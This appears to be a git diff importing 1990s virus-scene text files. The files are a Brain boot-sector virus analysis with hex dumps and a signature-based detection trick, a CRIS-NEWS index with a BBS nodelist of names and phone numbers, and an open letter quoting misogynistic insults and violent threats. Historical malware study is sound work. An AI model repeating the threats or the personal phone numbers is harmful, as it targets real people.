Whether there are hacker + versions or destruction was caused by the unstable character of the Brain + is a question. Certainly it is not difficult for an experienced program- + mer who has obtained a copy of the Brain to modify it's code. + +Note 1: In the January 31, 1988, issue of The New York Times, the article + about computer viruses contained the following: "Buried within the + code of the virus discovered at the University of Delaware was an + apparent ransom demand: Computer users who discovered the virus were + told to send $2,000 to an address in Pakistan to obtain an immunity + program, according to Harold Highland....The Pakistani contact was + not identified." This statement was never made by me and Vin McLellan + and the author of The New York Times article admits that it was never + made. Somewhere in the copy preparation and/or editing, the copy was + altered. In our discussion, I noted that the names of the authors and + their addresses in Lahore, Pakistan, were found in the virus and that + there was even a copyright notice. Because of other writers use of the + database of newspaper articles about viruses, several picked this qu- + ote up and used it without any verification. It has appeared in seve- + ral major newspapers in the States as well as in newspapers and the + computer trade press abroad. + +Note 2: This note is my own, and was not in the original article. I noticed + that the author of this article had said that other articles releas- + ed on the Brain virus had errors in them. I also noticed that his + article had an error in it, too. He said: + + By that time the virus has already hidden itself in RAM memory. Using a + clean bootable disk to start the system will result in that disk becom- + ing infected. (See Note 2). The virus will then spread to any other fl- + oppy used on the system. + + Now, this is not possible. If you do a "warm boot" the virus may be + able to survive and infect that clean bootable disk. 
BUT if you do + a "cold boot" and wait fifteen seconds before you turn the machine + back on, there is no possible way for the virus to infect that disk. + Once you shut the machine off, RAM is empty. NOTHING can possibly + survive in RAM after the machine has been shut off. Even if you did + do a warm boot, and the virus survived, just have that clean boot + disk write protected and the virus won't be able to infect it. + + +How The Virus Infects A Disk +----------------------------- + +When a Brain infected disk is inserted into a system, the virus first copies +itself to the highest area in memory. It resets the memory size by altering +interrupt vector A2H so as to protect the RAM resident virus. It also resets +interrupt vector 13H to point to the virus code in high memory and resets +interrupt vector 6H (unused under existing versions of DOS) to point to the +original interrupt vector, 13H. After the normal boot process is continued +with the loading of both IBMIO.COM and IBMDOS.COM under PC-DOS or IO.SYS and +MSDOS.SYS under MS-DOS. The infected disk contains a message and part of the +virus code in the boot sector. The remainder of the code and a copy of the +original boot sector is contained in three clusters (six sectors) that the +virus has labeled "bad" in the FAT. Figure 1 shows a map of an infected disk +obtained by using Central Point Software's PC Tools Deluxe. 
+ +Figure 1: + +----------------------------------------------------------------------------- +Entire Disk Mapped 80% free space + Track 1 1 2 2 3 3 3 +Double Sided 0 5 0 5 0 5 0 5 9 + Booooo.....+++++++++++++++++++++++++++++++ + Side 0 Fooooo.....+++++++++++++++++++++++++++++++ + Fooooo..X..+++++++++++++++++++++++++++++++ + Doooooo.X..+++++++++++++++++++++++++++++++ + -----------Doooooo.X..+++++++++++++++++++++++++++++++ + Dooooo.....+++++++++++++++++++++++++++++++ + Side 1 oooooo.....+++++++++++++++++++++++++++++++ + oooooo.....+++++++++++++++++++++++++++++++ + oooooo.....+++++++++++++++++++++++++++++++ + + + Explanation Of Codes: + + + Available . Allocated + B Boot Record o Hidden + F File Alloc. Table r Read Only + D Directory X Bad Cluster + +----------------------------------------------------------------------------- + +With the virus in upper RAM it is not possible to read the infected boot +sector. If an attempt is made to read the boot sector, the Brain re-directs +the request to read the original boot sector that is stored in one of the +bad sectors. The only way tp read the Brain message contained in the boot +sector, is to boot a system with a non-infected disk, preferably with a write +protect tab. Replace the boot disk with a write protected version of PC Tools +and place an infected disk in drive B. Figure 2 shows the embedded message by +using PC Tools to read the infected disk's boot sector. 
+ +Figure 2: + +----------------------------------------------------------------------------- + +Displacement -----------------HEX Values-------------------- ASCII Value +0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F Welcome to +0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20 the Dungeon +0048 (0030) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 +0064 (0040) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 +0080 (0050) 20 28 63 29 20 31 39 38 36 20 42 61 73 69 74 20 (C) 1986 Basit +0096 (0060) 26 20 41 6D 6A 61 64 20 28 70 76 74 29 20 4C 74 & Amjad (pvt) Lt +0112 (0070) 64 2E 20 20 20 20 20 20 20 20 20 20 20 20 20 20 d +0128 (0080) 20 42 52 41 49 4E 20 43 4F 4D 50 55 54 45 52 20 BRAIN COMPUTER +0144 (0090) 53 45 52 56 49 43 45 53 2E 2E 37 33 30 20 4E 49 SERVICES 730 NI +0160 (00A0) 54 41 4D 20 42 4C 4F 43 4B 20 41 4C 4C 41 4D 41 ZAM BLOCK ALLAMA +0176 (00B0) 20 49 51 42 41 4C 20 54 4F 57 4E 20 20 20 20 20 IGBAL TOWN +0192 (00C0) 20 20 20 20 20 20 20 20 20 20 20 4C 41 48 4F 52 LAHOR +0208 (00D0) 45 2D 50 41 4B 49 53 54 41 4E 2E 2E 50 48 4F 4E E-PAKISTAN PHON +0224 (00E0) 45 20 3A 34 33 30 37 39 31 2C 34 34 33 32 34 38 E 430791.443248 +0240 (00F0) 2C 32 38 30 35 33 30 2E 20 20 20 20 20 20 20 20 .280530 +0256 (0100) 20 20 42 65 77 61 72 65 20 6F 66 20 74 68 69 73 Beware of this +0272 (0110) 20 56 49 52 55 53 2E 2E 2E 2E 2E 43 6F 6E 74 61 VIRUS.....Conta +0288 (0120) 63 74 20 75 73 20 66 6F 72 20 76 61 63 63 69 6E ct us for vaccin +0304 (0130) 61 74 69 6F 6E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E ation....... + +----------------------------------------------------------------------------- + +The virus, residing in high memory, interrupts and disk READ request. If that +request is not for the boot sector or non-floppy drive, the virus reads the +boot sector of the disk. It examines the 4th and 5th bytes for "1234" that are +stored as 34 12, the signature of the Brain. 
If that signature is not present +on the floppy disk, the virus infects the disk then proceeds with the READ +command. If the disk is already infected, the virus does not re-infect the +disk but instead continues with the READ. Also if the disk is write protected, +the infection will be terminated. Figure 3 is a comparison of the initial po- +rtion of a good and an infected boot sector. + +Figure 3: + +----------------------------------------------------------------------------- + +GOOD Boot Sector: + +Displacement -----------------HEX Values-------------------- +0000 (0000) EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00 +0016 (0010) 02 70 00 D0 02 FD 02 00 09 00 02 00 00 00 00 00 +0032 (0020) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + +BAD Boot Sector: + +Displacement -----------------HEX Values-------------------- +0000 (0000) FA E9 4A 01 34 12 01 02 27 00 01 00 00 00 00 20 +0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F +0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20 + +----------------------------------------------------------------------------- + +Normally the virus, in its attempt to infect a disk, will search for three +consecutive clusters it can mark as "bad". If there are no blank clusters, the +virus will not infect the disk. However, if there is only one blank cluster +and it is neither of the last two clusters on the disk, the virus will select +the one blank cluster and overwrite the next two clusters and mark all three +as bad. If the overwritten material is part of a file, that file no longer can +be executed if it is a program, or read if it is a data file. This is one way +in which a user might learn that a disk has been infected. + +Poor Man's Filter +----------------- + +In our laboratory testing we found a simple, inexpensive method to protect a +disk from becoming infected by the Brain virus by checking if the virus is in +high memory. It is possible to prepare a test disk by following these simple +steps. 
+ +1. Format a floppy disk with or without a system. + +2. Use DEBUG.COM or PC Tools to edit the boot sector. The first line of the + boot sector appears as: + + EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00 + ----- + +3. Since the Brain examines the fifth and sixth bytes for its signature, + change those bytes to the virus' signature, 1234. Below is an altered + first line of a boot sector: + + EB 34 90 49 34 12 20 20 33 2E 32 00 02 02 01 00 + ----- + +Place this altered test disk in drive B and after the system prompt, A>, +type: DIR B: to obtain a directory of the test disk. If the system is infected +by the Brain virus, the following message will appear on the screen: + + Not ready, error reading Drive B Abort, Retry, Ignore? + +The disk with the altered boot sector will work only on a non-infected system. + +***************************************************************************** +The Alvi brothers, Basit and Amjad, sell compatible PCs in their store in +Lebore, Pakistan. When contacted by a reporter for "The Chronicle of Higher +Education," the 19-year old Basit Alvi admitted writing the virus and placing +it on a disk in 1986 "for fun." He reportedly gave a copy of the virus prog- +ram to a friend, another student. However, both brothers were at a loss in +explaining how the virus emigrated to the States. +***************************************************************************** + + +Final Notes: +------------ + +Thanks to Midnight Cowboy for writing those articles and showing interest in +the newsletter. Sorry I did not include them but I came to the conclusion +that there is not much use for batch file virii when there are languages such +as C and Assembly. I do appreciate the effort, though. + +Someone was SUPPOSED to write me a article for the Sample Source Code Dept. +on Pascal virii, but they never did it for me, just wanted to say thanks to +that person. 
+ +I got some bad feedback on my last issue of Viriisearch, and needless to say +I didn't like it too much. This person didn't like the fact that I had gone +over the C source code to ATTRB as much as I did. Well, I decided to go over +the source code really well because ATTRB is a well written program, as well +as a simple program, so I figured it would make you non C programmers inter- +ested in C and for you beginner C programmers, it would make you into a better +C programmer. What I covered on ATTRB last issue took me quite a while to +learn on my own and the knowledge is there for the taking. If you didn't like +it because you didn't understand it, I suggest you start learning C or Assem- +bly because that is, most likely, the only programming languages you will find +in this newsletter. And what does an attributes program have to do with virii? +Well, a lot of virii do have to change attributes on files and there was a +very well written, tight program to do it, in the last issue. + +Speaking of feedback, the more the better. Starting in the next issue, #4, I +will be featuring reader's feedback, which I will reply to. Provided I get +enough feedback. + +I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated +entirely to computer virii. + + +Until Next Time......Be Careful!!! + + * Criminal Minded * +----------------------------------------------------------------------------- diff --git a/textfiles.com/virus/cnws2000.vir b/textfiles.com/virus/cnws2000.vir new file mode 100644 index 00000000..a568ede1 --- /dev/null +++ b/textfiles.com/virus/cnws2000.vir 
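Review bot: the Brain "Poor Man's Filter" procedure in this hunk keys entirely on the two signature bytes `34 12` written at the fifth and sixth positions of the test disk's boot sector, yet the same article (item 7 and the paragraph closing the characteristics list) says modified "hacker versions" of the Brain exist, so the test disk only reveals a resident Brain that still checks for that exact marker; if the import carries any accompanying notes, that caveat belongs next to the `DIR B:` step. Minor consistency point in the same region: the infection description says the virus `examines the 4th and 5th bytes for "1234"` while the filter step says `the fifth and sixth bytes`; both hex dumps place `34 12` at zero-based offsets 4 and 5, so the statements differ only in counting convention, but a reader following the DEBUG edit could be misled into patching the wrong pair.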
@@ -0,0 +1,263 @@ + + + + + + + + Computer Virus Research and Information Service + (708) 863-5285 + CRIS-NEWS + + I N D E X + + Volume 1, Issue 2, May 1994 + + ************************************ + S T A N D A R D D I S C L A I M E R + ************************************ + + Crisnews will not be held responsible for the articles in this + or any other issue. Crisnews is meant as a place to voice your + views, opinions or feelings. The person writing the article will + have to check the info enclosed in it FOR ACCURACY AND TRUTH. + (of course we will reserve the right to edit out anything that we + find to be crude or overly offensive). The Authors of the articles + will alone, bear the responsiblty for what they write. + + The major goal of Crisnews is to let others out there voice + there opinions and views. Any person that wants to submit an article + may freely express there ideas. We will ask that you keep out any + kind of harsh remarks towards another, or "going out for blood" in + any way towards any person, group, or organization. + + ALL REBUTTALS AND NETMAIL, CONCERNING ARTICLES, OR THE CRISNEWS, WILL + BE INCLUDED IN AN OPEN SECTION IN THE CRISNEWS CALLED "COMMENTS + AND REBUTTALS" IN ALL FUTURE ISSUES. + + IF YOU DO NOT WANT YOUR COMMENTS INCLUDED IN THIS SECTION, YOU + MUST STATE THIS CLEARLY IN YOUR MESSAGE. + + ALL OPINIONS EXPRESSED HERE IN THIS NEWSLETTER ARE SOLELY THOSE + OF THE AUTHORS, AND NOT NESSARILY THOSE OF THE CRIS STAFF. + + + Articles/Topics +------------------------------------------------------------------------------- +000. This Article: The Index +------------------------------------------------------------------------------- +001. V I R N E T U S A - T h e F a c t s - By Michael Paris + As I Know Them First Hand From A Virnet Hierarchy +------------------------------------------------------------------------------- +002. 
The Virus Threat (c) Ian Douglas 1993 +------------------------------------------------------------------------------- +003. This is an attempt to explain some of the terminology used in + connection with viruses. By: Childe Roland - Cris South Africa +------------------------------------------------------------------------------- +004. Robert Slade Anti-Virus Contact List +------------------------------------------------------------------------------- +005. The V.I.R.U.S./Virus Doctor BBS List +------------------------------------------------------------------------------- +006. [Echoes of Conspiracy] - By FireCracker Part #1 +------------------------------------------------------------------------------- +007. [Echoes of Conspiracy] - By Michael Paris Part #2 + The Facts About Aristotle And His Friends, Things I have Seen and heard + and The things He Told Me. By: Michael Paris C.R.I.S +------------------------------------------------------------------------------- +008. Collection of Cris Info on new viruses researched CrisInfo 1 - 13 +------------------------------------------------------------------------------- +USERSIG.DAT Copy to your TBAV directory and type TBGENSIG {enter} +If you have a registered ver. This will add new signatures of new viruses. 
+------------------------------------------------------------------------------- + +*************************************************************************** +*************************************************************************** + +;---------------------------------------------------------------------------- +; CRiS Nodelist +Zone,77,CRiSNet_WHQ,Illinois_USA,Michael_Paris,1-708-863-5285,9600,CM,V32B,V42,XA, +; +; 119 SOUTH AFRICA HOST +Host,119,South_Africa_119_Host,South_Africa,Radix,27-11-953-5414,9600,CM,HST,XA,XX +,792,Mirrored_Trap_BBS,South_Africa,Raist_Majere,27-11-792-8878,9600,CM,V32B,V42B,XA,XX +,849,Telephone_Hogger,South_Africa,Richard_Parsons,27-11-849-7172,9600,CM,XA,V32B +,864,The_Secret_Passage,South_Africa,Shadow_Stalker,27-11-864-5787,9600,CM,V32B,V42B,XA,XX +,882,The_Hell's_Cafeteria,South_Africa,Radioactive_Rat,27-11-864-5787,9600,CM +,883,Total_Chaos,South_Africa,Logic,27-11-882-5314,9600,CM,V32B,V42B,XA,XX +,884,The_Lair_,South_Africa,Grey_Wolf,27-27-11-884-7945,9600,V32B,V42B,XA, +,953,Virus_Polytethnic,South_Africa,Childe_Roland,27-11-953-5414,9600,CM,HST,XA,XX +; +; 125 FRANCE HOST +Host,125,The_Lys_Valley_(Help_FD),Comines,Gerard_Manning,33-20631262,9600,CM,XA,V32B,V42B,H16,UNEC,REC +; +; 203 CONNETICUT HOST +Host,203,CT_203_Host,Norwich_CT,Robert_Szarka,1-203-886-1441,9600,CM,V32B,V42,XA +,445,Info_Net_BBS,Groton_CT,John_Luce,1-203-445-0607,9600,CM,V32B,V42,HST,XA +,886,CT_203_Host,Norwich_CT,Robert_Szarka,1-203-886-1441,9600,CM,V32B,V42,XA +,447,Imajica_BBS,New_London_CT,Larry_Hinkley,1-203-447-9372,9600,CM,V32B,V42,XA +; +; 206 WASHINGTON HOST +Host,206,WA_206_Host,Longview_WA,Jeanne_Lejon,1-206-577-7358,9600,CM,HST,V32B,V42,XA +; +; 210 SOUTH TEXAS HOST +Host,210,TX_210_Host,South_Texas,Adapa_Anu,1-210-540-3907,9600,CM,V32B,V42B,XA +; +; 300 AUSTRALIAN Host +Host,300,Australian_300_Host,Kallangur_Qld,Rod_Fewster,61-7-886-1886,9600,V32b,V42b,MNP,CM,XX 
+,1,Thunderbyte_Australia,Kallangur_Qld,Rod_Fewster,61-7-886-1886,9600,V32b,V42b,MNP,CM,XX +,2,Fractured_Programming_[NuKE]_Oz_HQ,Melbourne_Vic,Screaming_Radish,xx-x-xxx-xxxx,9600,V32b,CM,XX +; +; 305 FLORIDA HOST +Host,305,FL_305_Host,Coconut_Creek_FL,Bruce_Kniffen,1-305-975-5540,9600,V32B,V42B,CM,XA,V42,UNSMH +,351,Onyx_BBS,Fort_Lauderdale_FL,Tyler_Burns,1-305-351-5559,9600,V32B,V42B,CM,XA,V42,HST +,755,Jungle,Coral_Springs_FL,Chris_Geroy,1-305-746-0096,9600,V32B,V42B,CM,XA,V42,HST +,975,Star*Bank,Coconut_Creek_FL,Bruce_Kniffen,1-305-975-5540,9600,V32B,V42B,CM,XA,V42,UNSMH +,977,Deafie_BBS,Fort_Lauderdale_Florida,Steve_Brother,1-305-977-4265,V32B,V42B,CM,XA +; +; 312 ILLINOIS HOST +Host,312,IL_312_Host,Chicago_IL,Zeryis,1-312-622-3313,9600,CM,V32B,V42,XA +,237,The_Coliseum,Chicago_IL,Matthew_Swajkowski,1-312-237-2773,9600,CM,V42B,V32B,XA +,238,The_Game_Room,Chicago_IL,Rafal_Rusilowicz,1-312-237-XXXX,9600,CM,V42B,V32B,XA +,622,Ragnarok_BBS,Chicago_IL,Zeryis,1-312-622-3313,9600,CM,V32B,V42,XA +; +; 403 ALBERTA CANADA HOST +Host,403,Canada_403_Host,Alberta_Canada,Hans_Peterson,1-403-293-5659,9600,V32B,V42B,CM,XX,V42 +; +; 405 OKLAHOMA HOST +Host,405,Oklahoma_405_Host,Lawton_OK,Bill_Dirks,1-405-248-0528,9600,CM,V32B,V32B,XA +,721,Filthy_Habits,Oklahoma_City,John_Schlichting,1-405-721-8513,9600,CM,V32B,V42B,XA +; +; +; 406 MISSOULA MT HOST +Host,406,Missoula_MT_Host,Missoula_MT,Troy_Dowding,1-406-543-4978,9600,CM,V32B,V42B,XA +; +; 418 CANADA HOST COXAL CARMA +Host,418,Quebec_PQ_Host,Quebec_Canada,Martin_Rosa,1-418-878-5177,9600,CM,V32B,V42B,XA +; +; 443 MARTIN ROSELER GERMANY +Host,443,Germany_443_Host,Germany,Martin_Roseler,49-89-92793-593,9600,V32B,V42B,CM,XA +; +; 505 ALASKA HOST +Host,505,AK_505_Host,Alaska,Tiphoid_Mary,1-505-662-0659,9600,CM,V32B,V42,HST,XA +,662,Cypherspace,Alaska,Tiphoid_Mary,1-505-662-0659,9600,CM,V32B,V42,XX +; +; 517 LANSING MICHIGAN HOST +Host,517,MI_517_Host,Lansing_MI,Ender_Wiggins,1-517-485-6647,9600,CM,V32B,V42,XA +; +; 603 NEW 
HAMPSHIRE HOST +Host,603,NH_603_Host,New_Hampshire,Bill_Clark,1-603-279-9028,9600,V32B,V42,XA +,279,The_Hobby_Center,New_Hampshire,Bill_Clark,1-603-279-9028,9600,V32B,V42,XA +; +; 619 SAN DIEGO HOST +Host,619,SD_CA_619_Host,San_Diego_CA,Gary_Boutwell,1-619-278-5469,9600,CM,V32B,V42B,XA +,1,GCG_Programming,San_Diego_CA,George_Boutwell,1-619-278-5469,9600,CM,V32B,V42B,XA +,2,Toads_Place,Chula_Vista_CA,Bruce_Calvert,1-619-498-1146,9600,CM,V32B,V42B,XA +,3,Alabaster's_Cove_][,La_Mesa_CA,Brian_Schafrik,1-619-463-7230,9600,CM,V32B,V42B,XA +; +; 708 ILLINOIS HOST +Host,708,IL_708_Host,Cicero_IL,Michael_Paris,1-708-863-5285,9600,CM,V32B,V42,XA +,345,S.M.S_Services,Melrose_Park_IL,Steveoramma,1-708-345-1335,9600,CM,V32B,V42,XA +,358,Destructive_Lunacy,Boston_MA,NEC_Ken_Murray,1-708-358-8117,9600,CM,V32B,V42,HST,XA,TAG +,394,The_Rockhouse_Crew_BBS,Arlington Heights,Chris_Aseltine,1-708-394-5058,9600,CM,V32B,V42B,XA +,474,The_Lost_BBS,Chicago_IL,Ice_Nine,1-312-474-0710,9600,CM,V32B,V42,XA,TAG +,475,The_Lost_BBS,Chicago_IL,Ice_Nine,1-312-474-0711,9600,CM,V32B,V42,ZYX,XA +,485,Gramcracker,Brookfield_IL,Handcuffs,1-708-485-7261,9600,CM,HST,V32B,V42,XA +,489,Random_Access,Midlothian_IL,Pete_Frank,1-708-489-1542,9600,CM,V32B,V42,XA +,671,The_Half_Shekel,Schiller_Park,Efrayim_Neumann,1-708-671-9263,9600,V32B,V42B,XA,CM +,743,Programers_Cafe,Chicago_IL,Odin,1-312-274-5366,9600,CM,V32B,V42,HST,XA +,677,Warpspeed,Skokie_Il,Alex_Gen,1-708-677-6824,9600,V32B,V42B,CM +,863,CRiS_BBS,Cicero_IL,Michael_Paris,1-708-863-5285,9600,CM,V32B,V42,XA +,832,Mega_Motel,Elmhurst,Jim_O'Sullivan,1-708-832-2760,9600,CM,V42B,V32B,XA +,910,Embodyment_of_Souls,Woodridge,Jia_Shen,1-708-910-0642,9600,CM,V42B,V32B,XA +; +; 714 CALIFORNIA HOST +Host,714,CA_714_Host,Anaheim_CA,Falcon,1-714-772-7039,9600,CM,V32B,V42,XA +,772,West_Coast_Institute_of_Virus_Research,Anaheim_CA,Falcon,1-714-772-7039,9600,CM,V32B,V42,XA +; +; NEWPORT NEWS VA HOST 
+Host,790,VA_790_Host,Newport_News_VA,Firecracker,1-804-790-1329,9600,CM,XA +; +; 803 SC HOST +Host,803,SC_773_Host,Sumter_SC,Todd_Greene,1-803-773-9953,9600,CM,V32B,V42B,XA +; +; 804 VIRGINIA HOST +Host,804,VA_804_Host,Norfolk_VA,Roy_Ayres,1-804-461-2250,9600,CM,HST,V32B,V42,XA +; +; 815 ILLINOIS HOST +Host,815,IL_815_Host,Crystal_Lake_IL,Professor_X,1-815-455-2423,9600,CM,V32B,V42,XA +,455,File_Store_BBS,Crystal_Lake_IL,Professor_X,1-815-455-2423,9600,CM,V32B,V42,XA +; +; 816 HOST +Host,816,IL_816_Host,Golden_Country,Michael_McCabe/Brent_Hamm,1-816-455-2423,9600,CM,V32B,V42,XA +; +; +; 9041 PENSACOLA FLORIDA HOST +Host,9041,Pensacola_Host,Pensacola_Florida,Tony_Pittarese,1-904-494-6782,9600,CM,V42B,V32B,XA +,150,The_Haven_of_Rest,Pensacola_FL,John_Calvin_Hall,1-904-474-0992,9600,CM,XB,V32B,V42B +; +; +; 904 FLORIDA HOST +Host,904,FL_904_Host,Eglin_AFB,Alan_Jackson,1-904-729-2110,9600,CM,XA,V32b,V42B +,729,Digital_Underground,Eglin_AFB_FL,Alan_Jackson,1-904-729-2110,9600,CM,XA,V32B,V42B +; +; 919 Goldsborot NC HOST +Host,919,Goldsboro_NC_Host,Goldsborot_NC,Mike_Whatley,1-919-751-2324,9600,CM,XX,V32,V42,H16 +,111,Software Cache,Goldsboro_NC,Dave_Walden,1-919-736-0513,9600,CM,V32B,V42B,XA +; +Zone,76,CRiSNet_WHQ,Illinois_USA,Michael_Paris,1-708-863-5285,9600,CM,V32B,V42,XA, +; 519 WINDSOR ONTARIO HOST +Host,5190,CA_519_Host,Windsor_Ontario_CA,Art_Mason,1-519-972-6828,9600,V32B,V42B + + + *************************************************************************** + * CRiS Virus Bases * + *************************************************************************** + CV_BETA CRiS Virus Beta Testing Base. + In this base researchers and programmers + can talk about virus problems, and how they + are solved. or anything to do with brick walls + they run into. It also serves as A Virus Signature + Alert with the newest virus signatures that you can + add to your scanner. 
+ + MEMCRIS CRiS Members Base + This base is for CRiS research members + but it is a good learning tool to see what + is being researched, and what the outcomes were. + + CV_SEARCH Virus Search + Researchers looking for viruses are posted + here. If another user has the virus they can + find a way to get the file to each other. + UUENCODE supported area. + + CV_CHAT Chat With Mr. Virus + This echo is for anyone, less experienced users + can express their views and thoughts of any virus + manner. But watch out Mr. Virus might put his + two pennies in there + + C_VINEVP CRiS Private Sysop + For CRIS-NET Sysops ONLY! + + *************************************************************************** + Michael Paris World Headquarters of: + Computer Virus Research & Information Service (C.R.I.S) + 1:115/863 (FiDONet) + 77:708/0 (CRiSNet) + crisadm@netcom.com + *************************************************************************** + +*************************************************************************** + Cris will be turning this news letter into a full time thing. + We will be looking for reporters to bring in the scoops.. if you are + interested give us a call. +*************************************************************************** + + C.R.I.S + WANTS YOUR + V I R U S C O L L E C T I O N + Also Any New Viruses That Do Not Scan! + + Cris Has Thousands of Virus and Virus Utilities + On-Line To Serve Your Research Needs diff --git a/textfiles.com/virus/cnws2001.vir b/textfiles.com/virus/cnws2001.vir new file mode 100644 index 00000000..bb1c4b40 --- /dev/null +++ b/textfiles.com/virus/cnws2001.vir 
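Review bot: the `; CRiS Nodelist` region of this hunk (from `Zone,77,CRiSNet_WHQ,...` down to `Host,5190,CA_519_Host,...`) pairs several dozen personal names with direct telephone numbers; if this mirror applies any redaction policy to personal contact data, these are the lines to check before merging. The same region is also inconsistent as data and should be documented as a historical snapshot rather than a usable list: the WHQ appears as both `Zone,77,...` and `Zone,76,...`, the entry under `; 519 WINDSOR ONTARIO HOST` is numbered `Host,5190`, and `Host,816,IL_816_Host` reuses the 815 host's local number `455-2423` with only the area code changed. One line above the nodelist, `USERSIG.DAT Copy to your TBAV directory and type TBGENSIG {enter}` tells readers to load signatures from a file distributed with the newsletter; a note that this referenced file is not part of the import would avoid confusion.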
@@ -0,0 +1,523 @@ + V I R N E T U S A + T h e F a c t s + + As I Know Them First Hand From A Virnet Hierarchy + By Michael Paris. + C.R.I.S (Computer Research & Information Service) + 04/29/94 + + + +Part #1 Ethics +---------------- + +First I must say that it pains me to write this. I have had +nothing but respect for virnet and the people I have know in it. +But with certain info I have become aware of I feel it is my duty +as a part of the human race to make these facts known. + +I will separate this info into two parts, The first being the +morality of virnet hierarchies and the second in being facts on +their hidden background checks they have done on some of their +members. + +To start with I have turned in my node address for virnet for the +reasons you will see in this open letter, I do not care to continue +to receive the virnet echo anymore and feel that there is some +things you should be made aware of. + +1. A quick look through the virnet nodelist will tell you that +there are many people connected to this echo. Why? (Not sure to +tell you the truth). It seems that for the topic of viruses there +is not much said. I have wasted space on my drive and time polling +and sorting through the mail for a few announcements of files and +welcomes, no real info, just some meaningless messages on +percentages of echo feeds etc. + +This has changed a bit here in the US when they added the "movies" +echo, but this is not what I was looking for, if I wanted to talk +about movies I would get it from fido or usenet mail. + +2. The hierarchies of the net seem not to know much about viruses. +I will say that the people I have talked to do not even know what +a virus is! (no fun here) this is true. Log on to your favorite +virnet hub or node (even the hierarchies systems) ask them what +polymorphic, spawning, stealth, etc, is and they will not know. 
+(this of course is not all systems, but I will guarantee that it is +the most of them, and definitely the hierarchies in virnet). + +3. Lies, deceit, and morals. It seems that from the people I have +talked to they are no different from the people they talk against. +Most people know about their friend John, This man was accused of +being vulgar to the extremes, he is shunned for speaking very +obscene about female members of virnet, as well as his aditude that +just shows he is unbalanced in the mind. + +Well it seems I have found the same here in the virnet hierarchies, +talking to the people I have made me sick to my stomach and +reminded me of the talks I had with such unbalanced people as I did +before. It made me sick to see the hate expressed and the way it +came out. Talking compleatly about another topic would always +bring us back to the slander and foul language I did not want to +take part in. As for the lies and deceit we will get into that a +bit more in this letter. But as I have witnessed the hierarchies +would tell me one thing (I know was truth) and cover the facts to +the person it was about to avoid public embarrassment. + + +Below you will find an actual conversation between me and A person +in the virnet hierarchy. THIS IS -NOT- A NODE OR HUB speaking for +virnet, it is someone in the hierarchy of virnet in a decision +making level! + +[Narrator] + +The names were taken out to protect the guilty! + +This starts where this virnet hierarchy is talking about tring to +totaly get rid of an ex-virnet member that was found out to be a +nuke member getting the virnet echos. It makes me think why all the +bull shit seeing there is nothing really in the net to protect in +the first place but here is goes. 
+ +[Virnet Hierarchy] + +"and now all we need to do is get rid of ahh, [nukemember], or I +don't know I guess i'm gona have to get a few good minds together +and create some kind of document to finally put this to a final +statement ehhm" + +[Cris Staff Member] "well the biggest thing she has right know but she +does not have any proof of," + +[Virnet Hierarchy] + +"Uh hu" + +[Cris Staff Member] + +"is when you told here about the credit and legal check that was +done on her, She does not have any proof of it but" + +[Narrator] + +Cris Staff Member was interrupted + +[Virnet Hierarchy] + +"I told her my dick was twelve inches long she didn't talk about +that!" + +[Cris Staff Member] + +"I don't think that would matter much" + +[Virnet Hierarchy] + +"why wouldn't that, ya she's so fat it wouldn't even phase her, 320 +lbs. this girl is, I'd have to have a dick that was like god damm +A baseball bat." + +[Cris Staff Member] "ok we won't get into that" + +[Narrator] + +So the Cris Staff Member does not want to hear this garbage, Mr. +Virnet hierarchy goes on to talk about a previous Virnet hierarchy +that he was told was just as bad as this nuke member, because he +was told that virnet messages or files were being passed to the +virus groups through that person. Then he admits here and many +other times in this talk that he would rather join Crisnet and +leave virnet. + +It might seem like a great prize to get someone with this position +into Cris but, we take pride in having 'honest' and 'sincere' non +slandering people in Cris. Every person I have talked to on this +matter that knows him has got the same impression of him and it +would not help Cris in the long run. He offered to bring more then +half of virnet with him into Cris, but again it would not be worth +it in the long run. (one bad apple theory) + +[Virnet Hierarchy] + +"I heard that [old virnet hierarchy] was filtering virnet stuff to +nukenet." 
+ +[Cris Staff Member] + +"ya," + +[Virnet Hierarchy] + +"so now, you know, I mean, what's true, what's false, that's why I +would rather then there being such distinct lines I would rather go +in the middle with someone like you." + +"what I would love to do is leave my wife, turn out to be just, a +bum, and so I can go, and knock some sense into all of these that +are sitting back causing heck, AND PUT A COUPLE BULLETS IN THEIR +BRAINS! MAKE THEM SUFFER FIRST THOUGH! Because this is just to much +bullshit! Did you read the initial letter I wrote to [NukeMember]?" + + +"I've just been praying for someone to come over here or call, I +put my number out there, I am praying for all of these TUFF, BAD, +LILY WHITE MOTHER FUCKERS TO COME OVER HERE!" + +"I would LOVE, to see them come over here!" + +[Narrator] + +Some time passed by and they get on the topic of that nuke member +again, The Virnet Hierarchy thinks that the Cris staff member is +going to spill the beans and will not fully admit to him about a +certain matter. So he continues... + +[Virnet Hierarchy] + +"how do i tell you that this is a virnet policy situation among +hosts, consequently, it would be against policy for me to go taking +things any further with anyone but a host or higher, how does that +sound?" + +[Cris Staff Member] + +"ok, last time when we talked you had shared with me that you had +resources available and that you HAD done a background and legal +check on [nukemember]" + +[Virnet Hierarchy] + +"It really doesn't matt...ok number one it really does not effect +Cris Admin, ok, it really doesn't matter what we are doing! If I +was getting ready to get on a plane to fly out there and blow here +brains out does it matter?" + +[Cris Staff Member] + +"that would" + +[Virnet Hierarchy] + +"would you tell her?" + +[Cris Staff Member] + +"ya" + +[Virnet Hierarchy] + +"so with that in mind, why should I say anything? your showing +partiality to her!" 
